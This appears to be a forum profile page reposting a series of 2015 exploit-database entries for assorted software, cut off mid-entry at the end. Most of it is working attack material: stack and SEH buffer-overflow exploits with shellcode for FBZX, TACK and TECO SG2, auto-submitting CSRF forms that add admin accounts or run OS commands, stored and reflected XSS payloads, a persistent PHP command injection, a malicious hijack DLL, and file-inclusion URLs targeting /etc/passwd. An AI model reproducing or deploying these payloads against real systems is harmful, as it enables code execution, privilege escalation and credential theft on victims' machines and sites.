HireHackking

Everything posted by HireHackking

  1. # Exploit Author: Juan Sacco - http://www.exploitpack.com <jsacco@exploitpack.com>
     # Program: fbzx - ZX Spectrum Emulator for X
     # Tested on: GNU/Linux - Kali Linux 2.0 x86
     #
     # Description: FBZX v2.10 and prior is prone to a stack-based buffer overflow
     # vulnerability because the application fails to perform adequate
     # boundary-checks on user-supplied input.
     #
     # An attacker could exploit this issue to execute arbitrary code in the
     # context of the application. Failed exploit attempts will result in a
     # denial-of-service condition.
     #
     # Vendor homepage: http://www.rastersoft.com/
     # Kali Linux 2.0 package: http://repo.kali.org/kali/pool/contrib/f/fbzx/
     # MD5: 0fc1d2e9c374c1156b2b02186a9f8980

     import os, subprocess, sys  # sys is required by howtousage() below

     def run():
         try:
             print "# FBZX v2.10 Stack-Based Overflow by Juan Sacco"
             print "# It's Fuzzing time on unusable exploits"
             print "# This exploit is for educational purposes only"
             # Basic structure: JUNK + SHELLCODE + NOPS + EIP
             junk = "\x41"*8
             shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
             nops = "\x90"*5010
             eip = "\x10\xd3\xff\xbf"
             subprocess.call(["fbzx", ' ', junk + shellcode + nops + eip])
         except OSError as e:
             if e.errno == os.errno.ENOENT:
                 print "FBZX not found!"
             else:
                 print "Error executing exploit"
             raise

     def howtousage():
         print "Sorry, something went wrong"
         sys.exit(-1)

     if __name__ == '__main__':
         try:
             print "Exploit FBZX 2.10 Local Overflow Exploit"
             print "Author: Juan Sacco"
         except IndexError:
             howtousage()
         run()
  2. source: https://www.securityfocus.com/bid/61571/info

     Jahia xCM is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.

     An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

     Jahia xCM 6.6.1.0 r43343 is vulnerable; other versions may also be affected.

     <form action="http://www.example.com/administration/?do=users&sub=search" method="post" name="main">
     <input type="hidden" name="searchString" value="'><script>alert(document.cookie);</script>">
     <input type="submit" id="btn">
     </form>
     <script>
     document.main.submit();
     </script>

     <form action="http://www.example.com/administration/?do=users&sub=processCreate" method="post" name="main">
     <input type="hidden" name="username" value="'><script>alert(document.cookie);</script>">
     <input type="hidden" name="manage-user-property#j:firstName" value="'><script>alert(document.cookie);</script>">
     <input type="hidden" name="manage-user-property#j:lastName" value="'><script>alert(document.cookie);</script>">
     <input type="hidden" name="manage-user-property#j:email" value="'><script>alert(document.cookie);</script>">
     <input type="hidden" name="manage-user-property#j:organization" value="'><script>alert(document.cookie);</script>">
     <input type="hidden" name="actionType" value='save'>
     <input type="submit" id="btn">
     </form>
     <script>
     document.main.submit();
     </script>
  3. R-Scripts VRS 7R Multiple Stored XSS And CSRF Vulnerabilities

     Vendor: R-Scripts
     Product web page: http://www.r-scripts.com
     Affected version: 7R

     Summary: PHP Vacation Rental Script is the best solution for your vacation rentals online business.

     Desc: The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. A stored cross-site scripting vulnerability was also discovered. The issue is triggered when input passed via multiple POST parameters is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

     Tested on: Apache/2.2.29
                PHP/5.3.29

     Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                 @zeroscience

     Advisory ID: ZSL-2015-5274
     Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5274.php

     01.10.2015

     --

     CSRF Add Admin:
     ---------------

     <html>
     <body>
     <form action="http://127.0.0.1/admin/users/add" method="POST" enctype="multipart/form-data">
     <input type="hidden" name="role" value="admin" />
     <input type="hidden" name="username" value="Testingus" />
     <input type="hidden" name="password" value="123123" />
     <input type="hidden" name="retype&#95;password" value="123123" />
     <input type="hidden" name="generate&#95;password&#95;label" value="&#32;Generate&#32;password" />
     <input type="hidden" name="name" value="Test" />
     <input type="hidden" name="email" value="test&#64;test&#46;tld" />
     <input type="hidden" name="phone" value="111111111" />
     <input type="hidden" name="phone2" value="&#13;" />
     <input type="hidden" name="sms&#95;phone" value="&#13;" />
     <input type="hidden" name="sms&#95;active" value="0" />
     <input type="hidden" name="fax" value="&#13;" />
     <input type="hidden" name="country" value="Uganda" />
     <input type="hidden" name="location" value="N" />
     <input type="hidden" name="address" value="Address" />
     <input type="hidden" name="zip" value="&#13;" />
     <input type="hidden" name="active&#95;newsletter" value="0" />
     <input type="hidden" name="active" value="1" />
     <input type="hidden" name="banned" value="0" />
     <input type="hidden" name="ban&#95;reason" value="&#13;" />
     <input type="hidden" name="verified&#95;user" value="1" />
     <input type="hidden" name="paypal&#95;email" value="&#13;" />
     <input type="hidden" name="submitf" value="submit" />
     <input type="submit" value="CSRF Add Admin" />
     </form>
     </body>
     </html>

     Privilege Escalation:
     ---------------------

     <html>
     <body>
     <form action="http://127.0.0.1/admin/users/edit/4" method="POST" enctype="multipart/form-data">
     <input type="hidden" name="role" value="admin" />
     <input type="hidden" name="username" value="member" />
     <input type="hidden" name="password" value="&#13;" />
     <input type="hidden" name="retype&#95;password" value="&#13;" />
     <input type="hidden" name="generate&#95;password&#95;label" value="&#32;Generate&#32;password" />
     <input type="hidden" name="name" value="Member" />
     <input type="hidden" name="email" value="vrs&#95;owner&#64;vacationrentalscript&#46;com" />
     <input type="hidden" name="phone" value="&#13;" />
     <input type="hidden" name="phone2" value="&#13;" />
     <input type="hidden" name="sms&#95;phone" value="&#13;" />
     <input type="hidden" name="sms&#95;active" value="0" />
     <input type="hidden" name="fax" value="&#13;" />
     <input type="hidden" name="country" value="Germany" />
     <input type="hidden" name="location" value="test" />
     <input type="hidden" name="address" value="test&#32;address" />
     <input type="hidden" name="zip" value="&#13;" />
     <input type="hidden" name="active&#95;newsletter" value="1" />
     <input type="hidden" name="active" value="1" />
     <input type="hidden" name="banned" value="0" />
     <input type="hidden" name="ban&#95;reason" value="&#13;" />
     <input type="hidden" name="verified&#95;user" value="1" />
     <input type="hidden" name="paypal&#95;email" value="sandbox&#95;owner2&#64;vacationrentalscript&#46;com" />
     <input type="hidden" name="submitf" value="submit&#95;view" />
     <input type="submit" value="Escalate" />
     </form>
     </body>
     </html>

     Stored XSS:
     -----------

     <html>
     <body>
     <form action="http://127.0.0.1/admin/mail_templates/add" method="POST">
     <input type="hidden" name="alias" value='" onmousemove=confirm(1) >' />
     <input type="hidden" name="sender&#95;name" value='" onmousemove=confirm(2) >' />
     <input type="hidden" name="sender&#95;email" value='" onmousemove=confirm(3) >' />
     <input type="hidden" name="bcc&#95;copy" value='" onmousemove=confirm(4) >' />
     <input type="hidden" name="subject&#95;1" value='" onmousemove=confirm(5) >' />
     <input type="hidden" name="subject&#95;2" value="&#13;" />
     <input type="hidden" name="subject&#95;3" value="&#13;" />
     <input type="hidden" name="subject&#95;4" value="&#13;" />
     <input type="hidden" name="subject&#95;5" value="&#13;" />
     <input type="hidden" name="body&#95;1" value="test" />
     <input type="hidden" name="body&#95;2" value="&#13;" />
     <input type="hidden" name="body&#95;3" value="&#13;" />
     <input type="hidden" name="body&#95;4" value="&#13;" />
     <input type="hidden" name="body&#95;5" value="&#13;" />
     <input type="hidden" name="active" value="1" />
     <input type="hidden" name="is&#95;bulk&#95;mail" value="0" />
     <input type="hidden" name="submitf" value="submit&#95;view" />
     <input type="submit" value="XSS Add Mail" />
     </form>
     </body>
     </html>

     Stored XSS:
     -----------

     <html>
     <body>
     <form action="http://127.0.0.1/admin/locations/add" method="POST">
     <input type="hidden" name="location&#95;selected&#95;id" value="0" />
     <input type="hidden" name="temp&#95;lat" value="0" />
     <input type="hidden" name="temp&#95;lng" value="0" />
     <input type="hidden" name="title&#95;1" value='" onmousemove=confirm(1) >' />
     <input type="hidden" name="title&#95;2" value="&#13;" />
     <input type="hidden" name="title&#95;3" value="&#13;" />
     <input type="hidden" name="title&#95;4" value="&#13;" />
     <input type="hidden" name="title&#95;5" value="&#13;" />
     <input type="hidden" name="location&#95;parent&#95;id" value="&#45;1" />
     <input type="hidden" name="slug&#95;1" value="&#13;" />
     <input type="hidden" name="slug&#95;2" value="&#13;" />
     <input type="hidden" name="slug&#95;3" value="&#13;" />
     <input type="hidden" name="slug&#95;4" value="&#13;" />
     <input type="hidden" name="slug&#95;5" value="&#13;" />
     <input type="hidden" name="lat" value='" onmousemove=confirm(2) >' />
     <input type="hidden" name="lng" value='" onmousemove=confirm(3) >' />
     <input type="hidden" name="zip&#95;code" value="&#13;" />
     <input type="hidden" name="active" value="1" />
     <input type="hidden" name="submitf" value="submit" />
     <input type="submit" value="XSS Add Location" />
     </form>
     </body>
     </html>

     Stored XSS:
     -----------

     <html>
     <body>
     <form action="http://127.0.0.1/admin/coupons/add" method="POST">
     <input type="hidden" name="start&#95;date" value="&#13;" />
     <input type="hidden" name="start&#95;date&#95;picker" value="&#13;" />
     <input type="hidden" name="end&#95;date" value="2015&#45;11&#45;12" />
     <input type="hidden" name="end&#95;date&#95;picker" value='" onmousemove=confirm(1) >' />
     <input type="hidden" name="title" value='" onmousemove=confirm(2) >' />
     <input type="hidden" name="hash" value="RG8AVL" />
     <input type="hidden" name="coupon&#95;code" value='" onmousemove=confirm(3) >' />
     <input type="hidden" name="discount" value='" onmousemove=confirm(4) >' />
     <input type="hidden" name="utimes" value='" onmousemove=confirm(5) >' />
     <input type="hidden" name="active" value="1" />
     <input type="hidden" name="submitf" value="submit&#95;view" />
     <input type="submit" value="XSS Add Coupons" />
     </form>
     </body>
     </html>
  4. [+] Credits: hyp3rlinx
     [+] Website: hyp3rlinx.altervista.org
     [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-B374K-CSRF-CMD-INJECTION.txt

     Vendor:
     ============================================
     github.com/b374k/b374k
     code.google.com/p/b374k-shell/downloads/list
     code.google.com/archive/p/b374k-shell/

     Product:
     ==============================================
     b374k versions 3.2.3 and 2.8

     b374k is a PHP Webshell with many features such as:
     File manager (view, edit, rename, delete, upload, download as archive, etc)
     Command execution, Script execution (php, perl, python, ruby, java, node.js, c)
     Give you shell via bind/reverse shell connect
     Connect to DBMS (mysql, mssql, oracle, sqlite, postgresql, and many more using ODBC or PDO)
     Process list/Task manager.

     This is useful for system/web admin to do remote management without opening cpanel, connecting using ssh, ftp etc. All actions take place within a web browser.

     Note: b374k is considered by some as a malicious backdoor and is flagged by some AV upon download.

     Vulnerability Type:
     =============================
     CSRF Remote Command Injection

     Vulnerability Details:
     =====================
     No CSRF protection exists in b374k Web Shell allowing arbitrary OS command injection, if the currently logged in user visits our malicious website or clicks our infected links.

     vulnerable b374k code:

     <?php if(isset($_GP['cmd']))     <------ $_GP holds value of $_GET passed to the shell.

     <form action='<?php echo $s_self; ?>' method='post'>
     <input id='cmd' onclick="clickcmd();" class='inputz' type='text' name='cmd' style='width:70%;' value='<?php if(isset($_GP['cmd'])) echo ""; else echo "- shell command -"; ?>' />
     <noscript><input class='inputzbut' type='submit' value='Go !' name='submitcmd' style='width:80px;' /></noscript>
     </form>

     Exploit code(s):
     =================

     Run Windows calc.exe as POC...

     [CSRF Command Injections]

     v3.2

     Adding password and packing to b374k single PHP file.

     c:\xampp\htdocs\b374k-master>php -f index.php -- -o myshell.php -p abc123 -s -b -z gzcompress -c 9

     b374k shell packer 0.4.2
     Filename          : myshell.php
     Password          : xxxxxx
     Theme             : default
     Modules           : convert,database,info,mail,network,processes
     Strip             : yes
     Base64            : yes
     Compression       : gzcompress
     Compression level : 9
     Result            : Succeeded : [ myshell.php ]
     Filesize          : 111419

     (CSRF Command injection 1)

     <form id='ABYSMALGODS' action='http://localhost/b374k-master/myshell.php?run=convert,database,info,mail,network,processes' method='post'>
     <input id='cmd' type='text' name='terminalInput' value='calc.exe' />
     <script>document.getElementById('ABYSMALGODS').submit()</script>
     </form>

     v2.8

     (CSRF Command injection 2)

     <form id='HELL' action='http://localhost/b374k-2.8.php?' method='post'>
     <input id='cmd' type='text' name='cmd' value='calc.exe' />
     <script>document.getElementById('HELL').submit()</script>
     </form>

     Exploitation Technique:
     =======================
     Remote

     Severity Level:
     ===============
     High

     Description:
     ==================================================

     Request Method(s):        [+] POST
     Vulnerable Product:       [+] b374k 3.2 and 2.8
     Vulnerable Parameter(s):  [+] terminalInput, cmd
     Affected Area(s):         [+] OS

     [+] Disclaimer
     Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

     by hyp3rlinx
  5. # Exploit Author: Juan Sacco - http://www.exploitpack.com <jsacco@exploitpack.com>
     # Program: tack - Terminal action checker
     # Tested on: GNU/Linux - Kali Linux 2.0 x86
     #
     # Description: TACK v1.07 and prior is prone to a stack-based buffer overflow
     # vulnerability because the application fails to perform adequate
     # boundary-checks on user-supplied input.
     #
     # An attacker could exploit this issue to execute arbitrary code in the
     # context of the application. Failed exploit attempts will result in a
     # denial-of-service condition.
     #
     # Vendor homepage: http://www.znyx.com
     # Kali Linux 2.0 package: pool/main/t/tack/tack_1.07-1_amd64.deb
     # MD5: 0fc1d2e9c374c1156b2b02186a9f8980

     import os, subprocess, sys  # sys is required by howtousage() below

     def run():
         try:
             print "# TACK v1.07 Stack-Based Overflow by Juan Sacco"
             print "# It's Fuzzing time on unusable exploits"
             print "# This exploit is for educational purposes only"
             # Basic structure: JUNK + SHELLCODE + NOPS + EIP
             junk = "\x41"*10
             shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
             nops = "\x90"*3022
             eip = "\x30\xd1\xff\xbf"
             subprocess.call(["tack", ' ', junk + shellcode + nops + eip])
         except OSError as e:
             if e.errno == os.errno.ENOENT:
                 print "TACK not found!"
             else:
                 print "Error executing exploit"
             raise

     def howtousage():
         print "Sorry, something went wrong"
         sys.exit(-1)

     if __name__ == '__main__':
         try:
             print "Exploit TACK 1.07 Local Overflow Exploit"
             print "Author: Juan Sacco"
         except IndexError:
             howtousage()
         run()
  6. #!/usr/bin/env python
     # Exploit Title : Sam Spade 1.14 S-Lang Command Field SEH Overflow Crash PoC
     # Discovery by : Nipun Jaswal
     # Email : mail@nipunjaswal.info
     # Discovery Date : 12/11/2015
     # Vendor Homepage : http://samspade.org
     # Software Link : http://www.majorgeeks.com/files/details/sam_spade.html
     # Tested Version : 1.14
     # Vulnerability Type: Denial of Service (DoS) Local
     # Tested on OS : Windows XP Professional SP2 x86 es
     # Crash Point : Go to Tools > S-Lang Command > Enter the contents of 'sam_spade_slang_dos.txt' > OK , Note: Do Not Remove the round bracket
     ##########################################################################################
     # -----------------------------------NOTES----------------------------------------------#
     ##########################################################################################
     # And the Stack
     #00FBFE80   41414141  AAAA
     #00FBFE84   41414141  AAAA
     #00FBFE88   42424242  BBBB  Pointer to next SEH record
     #00FBFE8C   43434343  CCCC  SE handler
     # After the execution of POC, the SEH chain looks like this:
     #Address    SE handler
     #00FBFE88   43434343
     #42424242   *** CORRUPT ENTRY ***

     f = open("sam_spade_slang_dos.txt", "w")
     Junk_a = "A"*528
     nseh = "B" * 4
     seh = "C" * 4
     f.write(Junk_a+nseh+seh)
     f.close()
  7. source: https://www.securityfocus.com/bid/61578/info

     SilverStripe is prone to an information-disclosure vulnerability.

     An attacker can exploit this issue to gain access to sensitive information that may aid in further attacks.

     SilverStripe 3.0.3 is vulnerable; other versions may also be affected.

     http://<X.X.X.X:Port>/Security/LoginForm?AuthenticationMethod=MemberAuthenticator&Email=<email>&Password=<password>&BackURL=%2Fadmin%2Fpages&action_dologin=Log+in
  8. source: https://www.securityfocus.com/bid/61745/info

     HTC Sync Manager is prone to multiple arbitrary code-execution vulnerabilities.

     An attacker can exploit these issues by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.

     HTC Sync Manager 2.1.46.0 is vulnerable; other versions may also be affected.

     #include <windows.h>
     #include <stdlib.h>   /* system(), exit() */

     #define DllExport __declspec (dllexport)

     int egg(void);        /* forward declaration: egg() is defined after its first use */

     DllExport void DwmSetWindowAttribute()
     {
         egg();
     }

     int egg(void)
     {
         system ("calc");
         exit(0);
         return 0;
     }
  9. source: https://www.securityfocus.com/bid/61735/info

     Advanced Guestbook is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

     An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

     Advanced Guestbook 2.4.3 is vulnerable; other versions may also be affected.

     http://www.example.com.tw/guestbook/addentry.php
  10. source: https://www.securityfocus.com/bid/61733/info

      AlgoSec Firewall Analyzer is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

      An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

      AlgoSec Firewall Analyzer 6.1-b86 is affected; other versions may also be vulnerable.

      http://www.example.com/afa/php/Login.php/>'><ScRiPt>alert(11111111)</ScRiPt> HTTP/1.1
  11. source: https://www.securityfocus.com/bid/61728/info

      Kwok Information Server is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

      A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

      Kwok Information Server 2.7.3 and 2.8.4 are vulnerable; other versions may also be affected.

      http://www.example.com/kwok/IT/hardware-list.dll?cmd=search&hardwareType=49[Inject Payload Here]
      http://www.example.com/kwok/IT/hardware-list.dll?cmd=search&hardwareStatus=0[Inject Payload Here]
      http://www.example.com/kwok/IT/hardware-list.dll?cmd=search&hardwareLocation=0[Inject Payload Here]
  12. source: https://www.securityfocus.com/bid/61746/info

      CakePHP is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

      An attacker can exploit this vulnerability to view files or execute arbitrary script code in the context of the web server process. This may aid in further attacks.

      CakePHP 2.2.8 and 2.3.7 are vulnerable; other versions may also be affected.

      http://www.example.com/cakephp-2.3.7/theme/Test1/%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e./etc/passwd
      http://www.example.com/cakephp-2.3.7/DebugKit/%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e./etc/passwd
  13. source: https://www.securityfocus.com/bid/61770/info

      DotNetNuke is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

      An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

      DotNetNuke prior to versions 7.1.1 and 6.2.9 are vulnerable.

      http://www.example.com/?__dnnVariable={'__dnn_pageload':'alert(/XSS/)'}
  14. [+] Credits: hyp3rlinx
      [+] Website: hyp3rlinx.altervista.org
      [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-CFIMAGEHOST-PHP-CMD-INJECTION.txt

      Vendor:
      ====================================
      codefuture.co.uk/projects/imagehost

      Product:
      ===================================
      CF Image Host 1.65 - 1.6.6

      Archive download listed as: version 1.65
      unzips as imagehost 1.6.6

      Vulnerability Type:
      =====================
      PHP Command Injection

      CVE Reference:
      ==============
      N/A

      Vulnerability Details:
      =====================
      CF Imagehost allows users who have access to the management area the ability to write directly to the 'set.php' page under the /inc directory that stores setting values for the 'Site Title', 'Site Slogan' etc. This allows a local attacker the ability to inject specially crafted PHP command payloads to execute arbitrary operating system commands on the victim host. Possibly leading to privilege escalation, RFI, backdoors etc.. and most likely full compromise of the affected system or shared environment if applicable.

      PHP Command Injection Exploit code(s):
      =====================================

      Under the setting tab we can inject the following PHP code and it will remain persistent as it is written to disk in 'set.php'; afterwards, when the victim visits the application and clicks a tab, the persistent OS command will be executed.

      1) navigate to CF image host settings tab
         http://localhost/imagehost1.6.6/admin.php?act=set

      2) click on admin menu on left and enter your passwords
         DO NOT click 'Save changes' yet! or you get error message to enter creds

      3) now go back to settings tab and click 'General' then inject below PHP code into the 'Site Title' input field

      4) now click 'Save Changes', this code will get stored under /inc directory within the 'set.php' PHP file.

      our PHP injection payload needs the single quotes, double back slashes, semicolons as described below to correctly escape the syntax so we do not break the PHP page and cause errors, our extra \\ quotes and ; get removed after injection takes place.

      some examples...

      ';echo exec("c:\\Windows\\system32\\calc.exe");'';';

      'set.php' on line 11 then becomes:

      $settings['SET_TITLE'] = '';echo exec("c:\Windows\system32\calc.exe");'';';';

      OR inject CMD to launch chrome.exe etc...

      ';echo exec("c:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe");'';';

      After, click on some tabs above like 'Database' or 'Ban User' and Tada! this will execute our stored PHP command... either running calc.exe or launching Google Chrome.

      Disclosure Timeline:
      =====================
      Vendor Notification: NA
      November 13, 2015 : Public Disclosure

      Exploitation Technique:
      =======================
      Local / Remote

      Severity Level:
      ================
      High

      Description:
      ================================================================

      Request Method(s):        [+] POST
      Vulnerable Product:       [+] CF Image Host 1.65 - 1.6.6
      Vulnerable Parameter(s):  [+] 'Site Title', 'Site Slogan' etc..
      Affected Area(s):         [+] OS

      [+] Disclaimer
      Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

      by hyp3rlinx
  15. <!--
      [+] Credits: hyp3rlinx
      [+] Website: hyp3rlinx.altervista.org
      [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-CFIMAGEHOST-CSRF.txt

      Vendor:
      ====================================
      codefuture.co.uk/projects/imagehost

      Product:
      ===================================
      CF Image Host 1.65 - 1.6.6

      Archive download listed as: version 1.65
      unzips as imagehost 1.6.6

      Vulnerability Type:
      =================================
      Cross site request forgery - CSRF

      CVE Reference:
      ==============
      N/A

      Vulnerability Details:
      =====================
      No CSRF protection exists allowing attackers to make requests to the server on behalf of the victim if they are logged in and visit a malicious site or click an infected link. This will let attackers modify certain web application settings to whatever the attacker wishes.

      CSRF Exploit code(s):
      ====================
      -->

      <form id='HELL' method="POST" action="http://localhost/imagehost1.6.6/admin.php?act=set">
      <input type="text" name="setScriptUrl" value="http://hyp3rlinx.altervista.org" />
      <input type="text" name="setTitle" value="ghostofsin" />
      <input type="text" name="setSlogan" value="666" />
      <input type="text" name="setCopyright" value="hyp3rlinx" />
      <input type="text" name="setTheme" value="day" />
      <input type="text" name="setModeRewrite" value="0" />
      <input type="text" name="setAddThis" value="0" />
      <input type="text" name="setLanguage" value="0" />
      <input type="text" name="changesettings" value="Save+Changes" />
      <input type="text" name="setModeRewrite" value="0" />
      <input type="text" name="setAllowReport" value="1" />
      <input type="text" name="setEmailReport" value="1" />
      <input type="text" name="setHideGallery" value="1" />
      <input type="text" name="setHideContact" value="1" />
      <input type="text" name="setHideTos" value="1" />
      <input type="text" name="setHideFaq" value="1" />
      <input type="text" name="setHideSearch" value="1" />
      <input type="text" name="setImageWidgit" value="1" />
      <input type="text" name="setHideFeed" value="1" />
      <input type="text" name="setHideSitemap" value="1" />
      <input type="text" name="setAutoDeleted" value="0" />
      <input type="text" name="setAutoDeletedTime" value="10" />
      <input type="text" name="setAutoDeletedJump" value="m" />
      <input type="text" name="setDisUpload" value="0" />
      <input type="text" name="setAutoDeleted" value="0" />
      <input type="text" name="setMaxSize" value="1048576" />
      <input type="text" name="setMaxBandwidth" value="1024" />
      <input type="text" name="setBandwidthReset" value="m" />
      <input type="text" name="setMaxUpload" value="5" />
      <input type="text" name="setNoDuplicate" value="0" />
      <input type="text" name="setResizeImg" value="1" />
      <input type="text" name="setPrivateImg" value="1" />
      <input type="text" name="setWaterMark" value="0" />
      <input type="text" name="setWatermarkText" value="0" />
      <input type="text" name="setWatermarkImage" value="1" />
      <input type="text" name="setWatermarkPlaced" value="1" />
      <input type="text" name="setSUrlApi" value="b54" />
      <input type="text" name="setSUrlApiUrl" value="" />
      <input type="text" name="setSUrlApiUesr" value="" />
      <input type="text" name="setSUrlApiPass" value="" />
      <input type="text" name="setAnalytics" value="" />
      <input type="text" name="setGoogleCha" value="" />
      <input type="text" name="setGoogleAds" value="" />
      <input type="text" name="oldPassword" value="" />
      <input type="text" name="newPassword" value="" />
      <input type="text" name="newConfirm" value="" />
      <input type="text" name="setUserName" value="admin" />
      <input type="text" name="setEmail" value="ghostofsin@abyss.com" />
      <script>document.getElementById('HELL').submit()</script>
      </form>

      <!--
      Disclosure Timeline:
      =====================
      Vendor Notification: NA
      November 14, 2015 : Public Disclosure

      Exploitation Technique:
      =======================
      Remote

      Severity Level:
      ================
      High

      Description:
      ============================================================

      Request Method(s):        [+] POST
      Vulnerable Product:       [+] CF Image Host 1.65 - 1.6.6

      [+] Disclaimer
      Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

      by hyp3rlinx
      -->
  16. source: https://www.securityfocus.com/bid/61801/info

      ACal is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input before being used to include files.

      An attacker can exploit this vulnerability to view files or execute arbitrary script code in the context of the web server process. This may aid in further attacks.

      ACal 2.2.6 is vulnerable; other versions may also be affected.

      http://www.example.com/calendar/embed/example/example.php?view=../../etc/passwd%00
  17. #!/usr/bin/perl
      #
      #
      # TECO SG2 LAD Client 3.51 SEH Overwrite Buffer Overflow Exploit
      #
      #
      # Vendor: TECO Electric and Machinery Co., Ltd.
      # Product web page: http://www.teco-group.eu
      # Download: http://globalsa.teco.com.tw/support_download.aspx?KindID=9
      # Affected version: 3.51 and 3.40
      #
      # Summary: SG2 Client is a program that enables to create and edit applications.
      # The program is providing two edit modes, LADDER and FBD to rapidly and directly
      # input the required app. The Simulation Mode allows users to virtually run and test
      # the program before it is loaded to the controller.
      #
      # Desc: The vulnerability is caused due to a boundary error in the processing of a
      # Genie LAD file, which can be exploited to cause a buffer overflow when a user opens
      # e.g. a specially crafted .GEN file. Successful exploitation could allow execution
      # of arbitrary code on the affected machine.
      #
      # ---------------------------------------------------------------------------------
      # (10bc.1358): Access violation - code c0000005 (first chance)
      # First chance exceptions are reported before any exception handling.
      # This exception may be expected and handled.
      # eax=00000000 ebx=00000000 ecx=43434343 edx=7794b4ad esi=00000000 edi=00000000
      # eip=43434343 esp=0018dc24 ebp=0018dc44 iopl=0         nv up ei pl zr na pe nc
      # cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210246
      # 43434343 ??              ???
      # 0:000> !exchain
      # 0018dc38: ntdll!LdrRemoveLoadAsDataTable+d64 (7794b4ad)
      # 0018e1d4: ntdll!LdrRemoveLoadAsDataTable+d64 (7794b4ad)
      # 0018e800: MFC42!Ordinal1580+373 (708df2fc)
      # 0018f098: 43434343
      # Invalid exception stack at 42424242
      # ---------------------------------------------------------------------------------
      #
      # Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit
      #            Microsoft Windows 7 Ultimate SP1 (EN) 64bit
      #
      #
      # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
      #                             @zeroscience
      #
      #
      # Advisory ID: ZSL-2015-5275
      # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5275.php
      #
      #
      # 09.10.2015
      #

      # 113 bytes MessageBox shellcode
      my $sc = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42".
               "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03".
               "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b".
               "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e".
               "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c".
               "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x65\x64".
               "\x21\x01\x68\x20\x50\x77\x6e\x68\x20\x5a\x53\x4c\x89\xe1\xfe".
               "\x49\x0b\x31\xc0\x51\x50\xff\xd7";

      # Address = 0041D659
      # Message = 0x0041d659 : pop edi # pop esi # ret 0x04 # startnull {PAGE_EXECUTE_READ} [LAD.exe]
      # ASLR: False; # Rebase: False; # SafeSEH: False; # OS: False; # v0.2.9.0 (C:\Program Files (x86)\TECO\SG2 Client\LAD.exe)

      my $file = "lad.gen";
      my $junk = "\x41" x 21750 . "\xEB\x08\x90\x90" . "\x59\xd6\x41\x00" . "\x90" x 28 . $sc . "\x90" x 20;

      open($FILE,">$file");
      print $FILE "$junk";
      close($FILE);
      print "Malicious GEN file created successfully!\n";
18. #!/usr/bin/perl
#
#
# TECO JN5 L510-DriveLink 1.482 SEH Overwrite Buffer Overflow Exploit
#
#
# Vendor: TECO Electric and Machinery Co., Ltd.
# Product web page: http://www.teco-group.eu
# Download: http://globalsa.teco.com.tw/support_download.aspx?KindID=9
# Affected version: 1.482 and 1.462
#
# Summary: JN5 DriveLink is a free program that enables you to
# configure the AC Motor Drive, 510 Series PC-Link. It provides
# support for sleep and fire modes favourable for pumps, fans,
# compressors, and HVAC and communication network protocol of
# Modbus/ BACnet/ Metasys N2.
#
